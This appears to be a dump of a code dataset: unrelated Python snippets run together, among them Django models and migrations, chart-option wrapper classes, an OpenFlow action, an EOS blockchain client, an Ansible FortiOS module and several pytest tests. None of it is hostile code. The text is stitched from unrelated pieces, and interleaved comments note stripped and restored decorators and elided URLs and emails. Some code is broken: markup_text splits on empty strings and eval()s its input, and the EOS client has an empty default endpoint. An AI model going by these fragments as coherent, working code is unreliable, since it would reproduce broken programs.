[Dataset column: code (string lengths 281 to 23.7M)]
class EventUser(models.Model):
    objects = EventUserManager()
    created_at = models.DateTimeField(_('Created At'), auto_now_add=True)
    updated_at = models.DateTimeField(_('Updated At'), auto_now=True)
    user = models.ForeignKey(User, verbose_name=_('User'), blank=True, null=True)
    event = models.ForeignKey(Event, verbose_name=_('Event'))
    ticket = models.ForeignKey(Ticket, verbose_name=_('Ticket'), blank=True, null=True)

    def __str__(self):
        if self.user:
            return '{} at event:{}'.format(self.user.username, self.event)
        return '{}'.format(self.event)

    def get_ticket_data(self):
        if self.ticket is None:
            ticket = Ticket()
            ticket.save()
            self.ticket = ticket
            self.save()
        date = self.event.eventdate_set.order_by('date').first().date
        return {'first_name': self.user.first_name, 'last_name': self.user.last_name,
                'nickname': self.user.username, 'email': self.user.email,
                'event': self.event, 'event_date': date, 'ticket': self.ticket}

    def attended(self):
        return EventUserAttendanceDate.objects.filter(event_user=self).exists()

    def attended_today(self):
        return EventUserAttendanceDate.objects.filter(
            event_user=self, date__date=timezone.localdate()).exists()

    class Meta:
        unique_together = (('event', 'user'),)
        verbose_name = _('Event User')
        verbose_name_plural = _('Event Users')
class OptionPlotoptionsHistogramSonificationDefaultinstrumentoptionsMappingTremoloDepth(Options):
    # @property / @<name>.setter pairs restored: the decorators appear to have
    # been stripped in extraction (the bare duplicate `def`s would otherwise
    # shadow each other).

    @property
    def mapFunction(self):
        return self._config_get(None)

    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mapTo(self):
        return self._config_get(None)

    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)

    @property
    def max(self):
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def within(self):
        return self._config_get(None)

    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False)
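# The generated Options subclasses above and below all share one pattern: a
# read @property paired with a write @<name>.setter that stores into a config
# mapping. A minimal self-contained sketch of that pattern (the dict-backed
# base class here is a hypothetical stand-in, not the library's real base):
from typing import Any


class _SketchOptions:
    """Hypothetical dict-backed stand-in for the generated wrappers' base."""

    def __init__(self):
        self._config_vals = {}

    def _config_get(self, default: Any, name: str):
        return self._config_vals.get(name, default)

    def _config(self, value: Any, name: str, js_type: bool = False):
        self._config_vals[name] = value


class _SketchMapping(_SketchOptions):
    @property
    def max(self):
        return self._config_get(None, 'max')

    @max.setter
    def max(self, num: float):
        self._config(num, 'max')


opt = _SketchMapping()
opt.max = 3.5
assert opt.max == 3.5  # the setter wrote the value into the config mapping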
class OptionPlotoptionsColumnSonificationDefaultinstrumentoptionsMappingPan(Options):
    # @property / @<name>.setter pairs restored, as above.

    @property
    def mapFunction(self):
        return self._config_get(None)

    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mapTo(self):
        return self._config_get(None)

    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)

    @property
    def max(self):
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def within(self):
        return self._config_get(None)

    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False)
# Decorator restored per the Ryu sources; the `@OFPAction.register_` prefix was
# stripped in extraction, leaving the bare `_action_type(...)` call.
@OFPAction.register_action_type(ofproto.OFPAT_ENQUEUE, ofproto.OFP_ACTION_ENQUEUE_SIZE)
class OFPActionEnqueue(OFPAction):
    def __init__(self, port, queue_id):
        super(OFPActionEnqueue, self).__init__()
        self.port = port
        self.queue_id = queue_id

    @classmethod
    def parser(cls, buf, offset):
        (type_, len_, port, queue_id) = struct.unpack_from(
            ofproto.OFP_ACTION_ENQUEUE_PACK_STR, buf, offset)
        assert type_ == ofproto.OFPAT_ENQUEUE
        assert len_ == ofproto.OFP_ACTION_ENQUEUE_SIZE
        return cls(port, queue_id)

    def serialize(self, buf, offset):
        msg_pack_into(ofproto.OFP_ACTION_ENQUEUE_PACK_STR, buf, offset,
                      self.type, self.len, self.port, self.queue_id)
class OptionPlotoptionsColumnpyramidSonificationTracksMappingTremoloSpeed(Options):
    # @property / @<name>.setter pairs restored, as above.

    @property
    def mapFunction(self):
        return self._config_get(None)

    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mapTo(self):
        return self._config_get(None)

    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)

    @property
    def max(self):
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def within(self):
        return self._config_get(None)

    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False)
def extractSeethroughtranslationWordpressCom(item):
    (vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
    if (not (chp or vol)) or ('preview' in item['title'].lower()):
        return None
    tagmap = [('PRC', 'PRC', 'translated'),
              ('Loiterous', 'Loiterous', 'oel')]
    for (tagname, name, tl_type) in tagmap:
        if tagname in item['tags']:
            return buildReleaseMessageWithType(item, name, vol, chp, frag=frag,
                                               postfix=postfix, tl_type=tl_type)
    return False
class WorkflowCommon:
    # `@staticmethod` decorators restored (none of these take `self`), and the
    # indentation inside the generated helper scripts is restored; both were
    # flattened away in extraction.

    @staticmethod
    def createExternalDumpJob():
        with open('dump_job', 'w', encoding='utf-8') as f:
            f.write('INTERNAL FALSE\n')
            f.write('EXECUTABLE dump.py\n')
            f.write('MIN_ARG 2\n')
            f.write('MAX_ARG 2\n')
            f.write('ARG_TYPE 0 STRING\n')
        with open('dump_failing_job', 'w', encoding='utf-8') as f:
            f.write('INTERNAL FALSE\n')
            f.write('EXECUTABLE dump_failing.py\n')
        with open('dump.py', 'w', encoding='utf-8') as f:
            f.write('#!/usr/bin/env python\n')
            f.write('import sys\n')
            f.write("f = open('%s' % sys.argv[1], 'w')\n")
            f.write("f.write('%s' % sys.argv[2])\n")
            f.write('f.close()\n')
            f.write('print("Hello World")')
        with open('dump_failing.py', 'w', encoding='utf-8') as f:
            f.write('#!/usr/bin/env python\n')
            f.write('print("Hello Failing")\n')
            f.write('raise Exception')
        st = os.stat('dump.py')
        os.chmod('dump.py', st.st_mode | stat.S_IEXEC)
        st = os.stat('dump_failing.py')
        os.chmod('dump_failing.py', st.st_mode | stat.S_IEXEC)
        with open('dump_workflow', 'w', encoding='utf-8') as f:
            f.write('DUMP dump1 dump_text_1\n')
            f.write('DUMP dump2 dump_<PARAM>_2\n')

    @staticmethod
    def createErtScriptsJob():
        with open('subtract_script.py', 'w', encoding='utf-8') as f:
            f.write('from ert import ErtScript\n')
            f.write('\n')
            f.write('class SubtractScript(ErtScript):\n')
            f.write('    def run(self, arg1, arg2):\n')
            f.write('        return arg1 - arg2\n')
        with open('subtract_script_job', 'w', encoding='utf-8') as f:
            f.write('INTERNAL True\n')
            f.write('SCRIPT subtract_script.py\n')
            f.write('MIN_ARG 2\n')
            f.write('MAX_ARG 2\n')
            f.write('ARG_TYPE 0 FLOAT\n')
            f.write('ARG_TYPE 1 FLOAT\n')

    @staticmethod
    def createWaitJob():
        with open('wait_job.py', 'w', encoding='utf-8') as f:
            f.write('from ert import ErtScript\n')
            f.write('import time\n')
            f.write('\n')
            f.write('class WaitScript(ErtScript):\n')
            f.write('    def dump(self, filename, content):\n')
            f.write("        with open(filename, 'w') as f:\n")
            f.write('            f.write(content)\n')
            f.write('\n')
            f.write('    def run(self, number, wait_time):\n')
            f.write("        self.dump('wait_started_%d' % number, 'text')\n")
            f.write('        start = time.time()\n')
            f.write('        diff = 0\n')
            f.write('        while not self.isCancelled() and diff < wait_time:\n')
            f.write('            time.sleep(0.2)\n')
            f.write('            diff = time.time() - start\n')
            f.write('\n')
            f.write('        if self.isCancelled():\n')
            f.write("            self.dump('wait_cancelled_%d' % number, 'text')\n")
            f.write('        else:\n')
            f.write("            self.dump('wait_finished_%d' % number, 'text')\n")
            f.write('\n')
            f.write('        return None\n')
        with open('external_wait_job.sh', 'w', encoding='utf-8') as f:
            f.write('#!/usr/bin/env bash\n')
            f.write('echo "text" > wait_started_$1\n')
            f.write('sleep $2\n')
            f.write('echo "text" > wait_finished_$1\n')
        st = os.stat('external_wait_job.sh')
        os.chmod('external_wait_job.sh', st.st_mode | stat.S_IEXEC)
        with open('wait_job', 'w', encoding='utf-8') as f:
            f.write('INTERNAL True\n')
            f.write('SCRIPT wait_job.py\n')
            f.write('MIN_ARG 2\n')
            f.write('MAX_ARG 2\n')
            f.write('ARG_TYPE 0 INT\n')
            f.write('ARG_TYPE 1 INT\n')
        with open('external_wait_job', 'w', encoding='utf-8') as f:
            f.write('INTERNAL False\n')
            f.write('EXECUTABLE external_wait_job.sh\n')
            f.write('MIN_ARG 2\n')
            f.write('MAX_ARG 2\n')
            f.write('ARG_TYPE 0 INT\n')
            f.write('ARG_TYPE 1 INT\n')
        with open('wait_workflow', 'w', encoding='utf-8') as f:
            f.write('WAIT 0 1\n')
            f.write('WAIT 1 10\n')
            f.write('WAIT 2 1\n')
        with open('fast_wait_workflow', 'w', encoding='utf-8') as f:
            f.write('WAIT 0 1\n')
            f.write('EXTERNAL_WAIT 1 1\n')
def prune_empty_awards(award_tuple: Optional[tuple] = None) -> int:
    _find_empty_awards_sql = """
        SELECT a.id
        FROM vw_awards a
        LEFT JOIN vw_transaction_normalized tn ON tn.award_id = a.id
        WHERE tn IS NULL {}
    """.format('AND a.id IN %s' if award_tuple else '')
    _modify_subawards_sql = 'UPDATE subaward_search SET award_id = null WHERE award_id IN ({});'.format(_find_empty_awards_sql)
    _modify_financial_accounts_sql = """
        UPDATE financial_accounts_by_awards
        SET
            update_date = now(),
            award_id = null
        WHERE award_id IN ({});
    """.format(_find_empty_awards_sql)
    _delete_parent_award_sql = 'DELETE FROM parent_award WHERE award_id in ({});'.format(_find_empty_awards_sql)
    _prune_empty_awards_sql = 'DELETE FROM award_search WHERE award_id IN ({}) '.format(_find_empty_awards_sql)
    return execute_database_statement(
        _modify_subawards_sql + _modify_financial_accounts_sql
        + _delete_parent_award_sql + _prune_empty_awards_sql,
        [award_tuple, award_tuple, award_tuple, award_tuple])
class Organization(Base, FidesBase):
    __tablename__ = 'ctl_organizations'

    organization_parent_key = Column(String, nullable=True)
    controller = Column(PGEncryptedString, nullable=True)
    data_protection_officer = Column(PGEncryptedString, nullable=True)
    fidesctl_meta = Column(JSON)
    representative = Column(PGEncryptedString, nullable=True)
    security_policy = Column(String, nullable=True)
def test_subscriber_signature() -> None:
    with pytest.raises(LabgraphError) as err:

        class MyNode(Node):
            A = Topic(MyMessage)

            # Decorator restored; extraction left only the bare `(A)`.
            @subscriber(A)
            def my_subscriber(self) -> None:
                pass

    assert (
        "Expected subscriber 'my_subscriber' to have signature "
        "def my_subscriber(self, message: MyMessage) -> None" in str(err.value)
    )
def markup_text(source):
    # NOTE: the three split delimiters below were lost in extraction (they
    # survive only as empty strings, which str.split rejects); the original
    # code split on the display-math, inline-math, and code markers in turn.
    source = source.split('')
    for i in range(1, len(source), 2):
        source[i] = 'Expr(' + source[i] + ')'
        source[i] = '$$' + eval(source[i], pygrim.__dict__).latex() + '$$'
    source = ''.join(source)
    source = source.split('')
    for i in range(1, len(source), 2):
        source[i] = 'Expr(' + source[i] + ')'
        source[i] = '$' + eval(source[i], pygrim.__dict__).latex() + '$'
    source = ''.join(source)
    source = source.split('')
    for i in range(1, len(source), 2):
        source[i] = '<tt>' + markup_source(source[i]) + '</tt>'
    source = ''.join(source)
    return source
def extractNontransblogWordpressCom(item):
    (vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
    if (not (chp or vol)) or ('preview' in item['title'].lower()):
        return None
    if 'WATTT' in item['tags']:
        return buildReleaseMessageWithType(item, 'WATTT', vol, chp, frag=frag, postfix=postfix)
    return False
class Migration(migrations.Migration):
    dependencies = [('admin_interface', '0008_change_related_modal_background_opacity_type')]

    operations = [
        migrations.AddField(
            model_name='theme', name='env',
            field=models.CharField(
                choices=[('development', 'Development'), ('testing', 'Testing'),
                         ('staging', 'Staging'), ('production', 'Production')],
                default='development', max_length=50, verbose_name='environment')),
        migrations.AddField(
            model_name='theme', name='env_visible',
            field=models.BooleanField(default=True, verbose_name='visible')),
    ]
def test_opencascade_poisson(stepdata, order):
    (stepfile, h) = stepdata
    try:
        mh = OpenCascadeMeshHierarchy(stepfile, element_size=h, levels=2,
                                      order=order, cache=False, verbose=True)
    except ImportError:
        # pytest.skip takes the reason as its first positional argument; the
        # `msg=` keyword form was removed in recent pytest releases.
        pytest.skip('OpenCascade unavailable, skipping test')
    mesh = mh[-1]
    V = FunctionSpace(mesh, 'CG', 1)
    u = Function(V)
    v = TestFunction(V)
    f = Constant(1)
    F = inner(grad(u), grad(v)) * dx - inner(f, v) * dx
    bcs = DirichletBC(V, Constant(0), 1)
    params = {'mat_type': 'aij', 'snes_type': 'ksponly', 'ksp_type': 'fgmres',
              'ksp_max_it': 20, 'ksp_monitor_true_residual': None,
              'pc_type': 'mg', 'pc_mg_type': 'full',
              'mg_levels_ksp_type': 'chebyshev', 'mg_levels_pc_type': 'sor',
              'mg_coarse_ksp_type': 'preonly', 'mg_coarse_pc_type': 'lu',
              'mg_coarse_pc_factor_mat_solver_type': 'mumps',
              'mg_coarse_mat_mumps_icntl_14': 200}
    solve(F == 0, u, bcs, solver_parameters=params)
class SPIMaster(_SPIPrimitive):
    def __init__(self, device: SerialHandler = None):
        super().__init__(device)
        self.set_parameters()

    def set_parameters(self, primary_prescaler: int = _PPRE,
                       secondary_prescaler: int = _SPRE, CKE: int = _CKE,
                       CKP: int = _CKP, SMP: int = _SMP):
        self._set_parameters(primary_prescaler, secondary_prescaler, CKE, CKP, SMP)

    @classmethod  # decorator restored; the method takes `cls`
    def get_parameters(cls) -> Tuple[int]:
        return cls._get_parameters()
# Step decorator restored (assumed to be behave-style `@then`; extraction left
# only the bare step string). The step text is kept verbatim so it still
# matches the feature files.
@then('the following scripts are not ran')
def check_script_files_dont_exist(context):
    python_scripts = set(_get_fal_scripts(context))
    expected_scripts = set(map(_script_filename, context.table.headings))
    unexpected_runs = expected_scripts & python_scripts
    if unexpected_runs:
        to_report = ', '.join(unexpected_runs)
        assert False, f'Script files {to_report} should NOT BE present'
# `@pytest.mark` prefix restored; extraction left only the bare argument list.
@pytest.mark.parametrize('calling_file, calling_module', [
    ('tests/test_apps/app_with_cfg_groups/my_app.py', None),
    (None, 'tests.test_apps.app_with_cfg_groups.my_app'),
])
def test_app_with_config_groups__override_all_configs(
        hydra_restore_singletons: Any, hydra_task_runner: TTaskRunner,
        calling_file: str, calling_module: str) -> None:
    with hydra_task_runner(calling_file=calling_file, calling_module=calling_module,
                           config_path='conf', config_name=None,
                           overrides=['+optimizer=adam', 'optimizer.lr=10'],
                           configure_logging=True) as task:
        assert task.job_ret is not None
        assert task.job_ret.cfg == dict(optimizer=dict(type='adam', lr=10, beta=0.01))
        verify_dir_outputs(task.job_ret, overrides=task.overrides)
def test_providers_value_setting(config):
    a = config.a
    ab = config.a.b
    abc = config.a.b.c
    abd = config.a.b.d
    config.update({'a': {'b': {'c': 1, 'd': 2}}})
    assert a() == {'b': {'c': 1, 'd': 2}}
    assert ab() == {'c': 1, 'd': 2}
    assert abc() == 1
    assert abd() == 2
class EosApi:
    def __init__(self, rpc_host: str = '', timeout: int = 120):
        # NOTE: the default RPC endpoint URL was elided in the source text; an
        # empty string is kept as a placeholder.
        self.rpc_host = rpc_host
        self.accounts: Dict[str, Account] = {}
        self.cpu_payer: Account = None
        self.session = requests.Session()
        self.session.trust_env = False
        self.session.headers['User-Agent'] = 'Mozilla/5.0'
        self.session.request = functools.partial(self.session.request, timeout=timeout)

    def import_key(self, account: str, private_key: str, permission: str = 'active'):
        account = Account(account, private_key, permission)
        self.accounts[account.index()] = account

    def import_keys(self, accounts: Union[List[Dict], List[Account]]):
        for item in accounts:
            if isinstance(item, dict):
                account = Account(item['account'], item['private_key'], item['permission'])
            elif isinstance(item, Account):
                account = item
            else:
                raise TypeError('unknown account type')
            self.accounts[account.index()] = account

    def set_cpu_payer(self, account: str, private_key: str, permission: str = 'active'):
        self.cpu_payer = Account(account, private_key, permission)

    def remove_cpu_payer(self):
        self.cpu_payer = None

    def post(self, url: str, post_data: Dict = None) -> requests.Response:
        resp = self.session.post(url, json=post_data)
        if resp.status_code == 500:
            raise TransactionException('transaction error: {0}'.format(resp.text), resp)
        if (resp.status_code >= 300) or (resp.status_code < 200):
            raise NodeException('eos node error, bad http status code: {0}'.format(resp.status_code), resp)
        return resp

    def abi_json_to_bin(self, code: str, action: str, args: Dict) -> bytes:
        url = self.rpc_host + '/v1/chain/abi_json_to_bin'
        post_data = {'code': code, 'action': action, 'args': args}
        resp = self.post(url, post_data)
        binargs = resp.json().get('binargs')
        if binargs is None:
            raise NodeException('eos node error, binargs not found', resp)
        return bytes.fromhex(binargs)

    def get_info(self) -> Dict:
        url = self.rpc_host + '/v1/chain/get_info'
        resp = self.post(url)
        return resp.json()

    def post_transaction(self, trx: Transaction, compression: bool = False,
                         packed_context_free_data: str = '') -> Dict:
        url = self.rpc_host + '/v1/chain/push_transaction'
        post_data = {'signatures': trx.signatures, 'compression': compression,
                     'packed_context_free_data': packed_context_free_data,
                     'packed_trx': trx.pack().hex()}
        resp = self.post(url, post_data)
        return resp.json()

    def get_table_rows(self, post_data: Dict) -> Dict:
        url = self.rpc_host + '/v1/chain/get_table_rows'
        resp = self.post(url, post_data)
        return resp.json()

    def make_transaction(self, trx: Dict) -> Transaction:
        if self.cpu_payer:
            trx['actions'][0]['authorization'].insert(
                0, {'actor': self.cpu_payer.account, 'permission': self.cpu_payer.permission})
        actors = []
        actions = []
        for item in trx['actions']:
            authorization = []
            for auth in item['authorization']:
                authorization.append(Authorization(actor=auth['actor'], permission=auth['permission']))
                # (spelling of `actor_permission` normalized from the source's
                # `actor_premission` throughout)
                actor_permission = '{0}-{1}'.format(auth['actor'], auth['permission'])
                if actor_permission not in actors:
                    actors.append(actor_permission)
            actions.append(Action(account=item['account'], name=item['name'],
                                  authorization=authorization, data=item['data']))
        trx = Transaction(actions=actions)
        for item in trx.actions:
            binargs = self.abi_json_to_bin(item.account, item.name, item.data)
            item.link(binargs)
        net_info = self.get_info()
        trx.link(net_info['last_irreversible_block_id'], net_info['chain_id'])
        signed_keys = []
        for actor_permission in actors:
            if actor_permission in self.accounts:
                private_key = self.accounts[actor_permission].private_key
            elif self.cpu_payer and (actor_permission == self.cpu_payer.index()):
                private_key = self.cpu_payer.private_key
            else:
                continue
            if private_key not in signed_keys:
                trx.sign(private_key)
                signed_keys.append(private_key)
        return trx

    def push_transaction(self, trx: Union[Dict, Transaction],
                         extra_signatures: Union[str, List[str]] = None) -> Dict:
        if isinstance(trx, dict):
            trx = self.make_transaction(trx)
        if extra_signatures:
            if isinstance(extra_signatures, str):
                extra_signatures = [extra_signatures]
            for item in extra_signatures:
                if item not in trx.signatures:
                    trx.signatures.append(item)
        return self.post_transaction(trx)
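# A hedged usage sketch for the EosApi client above. The endpoint, account
# names, and key are placeholders; Account and Transaction come from the
# surrounding module.
api = EosApi(rpc_host='https://eos.example.invalid', timeout=30)
api.import_key('alice', '5K...private-key-elided...', permission='active')

transfer = {
    'actions': [{
        'account': 'eosio.token',
        'name': 'transfer',
        'authorization': [{'actor': 'alice', 'permission': 'active'}],
        'data': {'from': 'alice', 'to': 'bob', 'quantity': '1.0000 EOS', 'memo': ''},
    }]
}
# push_transaction() builds, signs, and posts the transaction in one call.
receipt = api.push_transaction(transfer)
print(receipt)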
def main():
    module_spec = schema_to_module_spec(versioned_schema)
    mkeyname = 'id'
    fields = {
        'access_token': {'required': False, 'type': 'str', 'no_log': True},
        'enable_log': {'required': False, 'type': 'bool', 'default': False},
        'vdom': {'required': False, 'type': 'str', 'default': 'root'},
        'member_path': {'required': False, 'type': 'str'},
        'member_state': {'type': 'str', 'required': False, 'choices': ['present', 'absent']},
        'state': {'required': True, 'type': 'str', 'choices': ['present', 'absent']},
        'firewall_internet_service_owner': {'required': False, 'type': 'dict', 'default': None, 'options': {}},
    }
    for attribute_name in module_spec['options']:
        fields['firewall_internet_service_owner']['options'][attribute_name] = module_spec['options'][attribute_name]
        if mkeyname and mkeyname == attribute_name:
            fields['firewall_internet_service_owner']['options'][attribute_name]['required'] = True
    module = AnsibleModule(argument_spec=fields, supports_check_mode=True)
    check_legacy_fortiosapi(module)
    is_error = False
    has_changed = False
    result = None
    diff = None
    versions_check_result = None
    if module._socket_path:
        connection = Connection(module._socket_path)
        if 'access_token' in module.params:
            connection.set_option('access_token', module.params['access_token'])
        if 'enable_log' in module.params:
            connection.set_option('enable_log', module.params['enable_log'])
        else:
            connection.set_option('enable_log', False)
        fos = FortiOSHandler(connection, module, mkeyname)
        versions_check_result = check_schema_versioning(fos, versioned_schema, 'firewall_internet_service_owner')
        (is_error, has_changed, result, diff) = fortios_firewall(module.params, fos, module.check_mode)
    else:
        module.fail_json(**FAIL_SOCKET_MSG)
    if versions_check_result and versions_check_result['matched'] is False:
        module.warn('Ansible has detected a version mismatch between the FortiOS system and your playbook; see more details by specifying option -vvv')
    if not is_error:
        if versions_check_result and versions_check_result['matched'] is False:
            module.exit_json(changed=has_changed, version_check_warning=versions_check_result, meta=result, diff=diff)
        else:
            module.exit_json(changed=has_changed, meta=result, diff=diff)
    elif versions_check_result and versions_check_result['matched'] is False:
        module.fail_json(msg='Error in repo', version_check_warning=versions_check_result, meta=result)
    else:
        module.fail_json(msg='Error in repo', meta=result)
# Assumed to be a pytest fixture; the decorator appears to have been stripped
# in extraction, as with the other decorators in this set.
@pytest.fixture
def df():
    df = pd.DataFrame({
        'Name': ['tom', 'nick', 'krish', 'jack'],
        'City': ['London', 'Manchester', 'Liverpool', 'Bristol'],
        'Age': [20, 21, 19, 18],
        'Marks': [0.9, 0.8, 0.7, 0.6],
        'date_range': pd.date_range('2020-02-24', periods=4, freq='T'),
        'date_obj0': ['2020-02-24', '2020-02-25', '2020-02-26', '2020-02-27'],
    })
    df['Name'] = df['Name'].astype('category')
    return df
class TestPrivacyRequestCacheFailedStep:
    def test_cache_failed_step_and_collection(self, privacy_request):
        privacy_request.cache_failed_checkpoint_details(step=CurrentStep.erasure, collection=paused_location)
        cached_data = privacy_request.get_failed_checkpoint_details()
        assert cached_data.step == CurrentStep.erasure
        assert cached_data.collection == paused_location
        assert cached_data.action_needed is None

    def test_cache_null_step_and_location(self, privacy_request):
        privacy_request.cache_failed_checkpoint_details()
        cached_data = privacy_request.get_failed_checkpoint_details()
        assert cached_data is None
class BrowseFlagsTests(DatabaseTestCase):
    def setUp(self):
        super().setUp()
        session = Session()
        # NOTE: user email addresses and project homepage URLs were elided in
        # the source text; empty strings are kept as placeholders.
        self.user = models.User(email='', username='user')
        user_social_auth = social_models.UserSocialAuth(user_id=self.user.id, user=self.user)
        session.add(self.user)
        session.add(user_social_auth)
        self.admin = models.User(email='', username='admin')
        admin_social_auth = social_models.UserSocialAuth(user_id=self.admin.id, user=self.admin)
        self.project1 = models.Project(name='test_project', homepage='', backend='PyPI')
        self.project2 = models.Project(name='project2', homepage='', backend='PyPI')
        self.flag1 = models.ProjectFlag(reason='I wanted to flag it', user='user', project=self.project1)
        self.flag2 = models.ProjectFlag(reason='This project is wrong', user='user', project=self.project2)
        session.add_all([admin_social_auth, self.admin, self.project1, self.project2, self.flag1, self.flag2])
        session.commit()
        mock_config = mock.patch.dict(models.anitya_config, {'ANITYA_WEB_ADMINS': [six.text_type(self.admin.id)]})
        mock_config.start()
        self.addCleanup(mock_config.stop)
        self.client = self.flask_app.test_client()

    def test_non_admin_get(self):
        with login_user(self.flask_app, self.user):
            output = self.client.get('/flags')
            self.assertEqual(401, output.status_code)

    def test_admin_get(self):
        with login_user(self.flask_app, self.admin):
            output = self.client.get('/flags')
            self.assertEqual(200, output.status_code)
            self.assertTrue(b'I wanted to flag it' in output.data)
            self.assertTrue(b'This project is wrong' in output.data)

    def test_pages(self):
        with login_user(self.flask_app, self.admin):
            page_one = self.client.get('/flags?limit=1&page=1')
            self.assertEqual(200, page_one.status_code)
            self.assertTrue((b'I wanted to flag it' in page_one.data)
                            or (b'This project is wrong' in page_one.data))
            self.assertFalse((b'I wanted to flag it' in page_one.data)
                             and (b'This project is wrong' in page_one.data))

    def test_from_date(self):
        with login_user(self.flask_app, self.admin):
            output = self.client.get('/flags?from_date=2017-07-01')
            self.assertEqual(200, output.status_code)
            self.assertTrue(b'I wanted to flag it' in output.data)
            self.assertTrue(b'This project is wrong' in output.data)

    def test_from_date_future(self):
        with login_user(self.flask_app, self.admin):
            output = self.client.get('/flags?from_date=2200-07-01')
            self.assertEqual(200, output.status_code)
            self.assertFalse(b'I wanted to flag it' in output.data)
            self.assertFalse(b'This project is wrong' in output.data)
def upgrade():
    op.create_table(
        'authenticationrequest',
        sa.Column('id', sa.String(length=255), nullable=False),
        sa.Column('created_at', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True),
        sa.Column('updated_at', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True),
        sa.Column('connection_key', sa.String(), nullable=False),
        sa.Column('state', sa.String(), nullable=False),
        sa.PrimaryKeyConstraint('id'),
        sa.UniqueConstraint('connection_key'),
    )
    op.create_index(op.f('ix_authenticationrequest_id'), 'authenticationrequest', ['id'], unique=False)
    op.create_index(op.f('ix_authenticationrequest_state'), 'authenticationrequest', ['state'], unique=True)
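# Alembic migrations normally pair upgrade() with a downgrade(); the source row
# does not include one, so this is a minimal sketch of the inverse under the
# same `op` import, not code from the original module.
def downgrade():
    # Drop the indexes first, then the table itself.
    op.drop_index(op.f('ix_authenticationrequest_state'), table_name='authenticationrequest')
    op.drop_index(op.f('ix_authenticationrequest_id'), table_name='authenticationrequest')
    op.drop_table('authenticationrequest')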
def check_image_desc(desc, parse_full_locs=True):
    if '::' not in desc:
        return ('', [])
    image_url = ''
    full_locs = [[], [], [], [], []]
    items = str(desc).split('::')
    for pre_item in items:
        if (pre_item[:3] == 'img') and ('=' in pre_item):
            item = pre_item.split('=')[1].lstrip().rstrip()
        else:
            continue
        if os.path.isfile(item) and (item.split('.')[-1] in ('png', 'bmp', 'jpg', 'jpeg', 'tif', 'tiff', 'webp')):
            image_url = str(item)
            break
    if image_url and parse_full_locs:
        for pre_item in items:
            if (pre_item[:3] == 'loc') and ('=' in pre_item):
                item = pre_item.split('=')[1].lstrip().rstrip()
            else:
                continue
            if check_is_num(item, scope=([str(i) for i in range(10)] + ['.', ',', ';', 'N'])):
                item_str_lst = item.split(';;')
                if len(item_str_lst) == 5:
                    for idx in range(5):
                        loc_str_lst = item_str_lst[idx].split(';')
                        for loc_str in loc_str_lst:
                            if loc_str == 'N':
                                full_locs[idx].append(None)
                            else:
                                loc = loc_str.split(',')
                                if (len(loc) == 2
                                        and check_is_num(loc[0], scope=([str(i) for i in range(10)] + ['.']))
                                        and check_is_num(loc[1], scope=([str(i) for i in range(10)] + ['.']))
                                        and loc[0].count('.') < 2 and loc[1].count('.') < 2):
                                    loc = (float(loc[0]), float(loc[1]))
                                    if (0.0 <= loc[0] <= 1.0) and (0.0 <= loc[1] <= 1.0):
                                        full_locs[idx].append(loc)
                                    else:
                                        return (image_url, [])
                                else:
                                    return (image_url, [])
                else:
                    full_locs = [[], [], [], [], []]
                if full_locs[0] or full_locs[1] or full_locs[2] or full_locs[3] or full_locs[4]:
                    break
                else:
                    return (image_url, [])
    return (image_url, full_locs)
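# An illustrative call showing the '::'-separated description format the parser
# above expects. The image path is hypothetical and must exist with one of the
# accepted extensions for image_url to be set.
desc = 'img=/tmp/panel.png::loc=0.1,0.2;0.3,0.4;;N;;N;;N;;N'
image_url, full_locs = check_image_desc(desc)
# With /tmp/panel.png present: image_url == '/tmp/panel.png',
# full_locs[0] == [(0.1, 0.2), (0.3, 0.4)], and each of full_locs[1:] == [None].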
class OptionSeriesPictorialSonificationDefaultspeechoptionsActivewhen(Options):
    # @property / @<name>.setter pairs restored, as above.

    @property
    def crossingDown(self):
        return self._config_get(None)

    @crossingDown.setter
    def crossingDown(self, num: float):
        self._config(num, js_type=False)

    @property
    def crossingUp(self):
        return self._config_get(None)

    @crossingUp.setter
    def crossingUp(self, num: float):
        self._config(num, js_type=False)

    @property
    def max(self):
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def prop(self):
        return self._config_get(None)

    @prop.setter
    def prop(self, text: str):
        self._config(text, js_type=False)
class Migration(migrations.Migration):
    dependencies = [('sites', '0001_initial')]

    operations = [
        migrations.AddField(
            model_name='site', name='name',
            field=models.CharField(default='changeme', max_length=255, unique=True, verbose_name='Name'),
            preserve_default=False),
        migrations.AlterField(
            model_name='site', name='url',
            field=models.URLField(unique=True, verbose_name='URL')),
    ]
# `@pytest.mark` prefix restored; extraction left only `.parametrize(...)`.
@pytest.mark.parametrize('test_input, expected', [
    ('10.10.1.1', True), ('10.0.0.0', True), ('10.0.0', False),
    ('10.0.0.0/24', False), ('10.0.0.0/32', False), ('test', False),
    (10, False), (1.0, False), (True, False), ('/does/not/exist', False),
    ([], False), ({}, False),
])
def test_ip_address_type(test_input, expected):
    assert config.IP.type_check(test_input) == expected
    assert str(config.IP) == 'IPv4 or IPv6 address'
class VideoUploadSession(object):
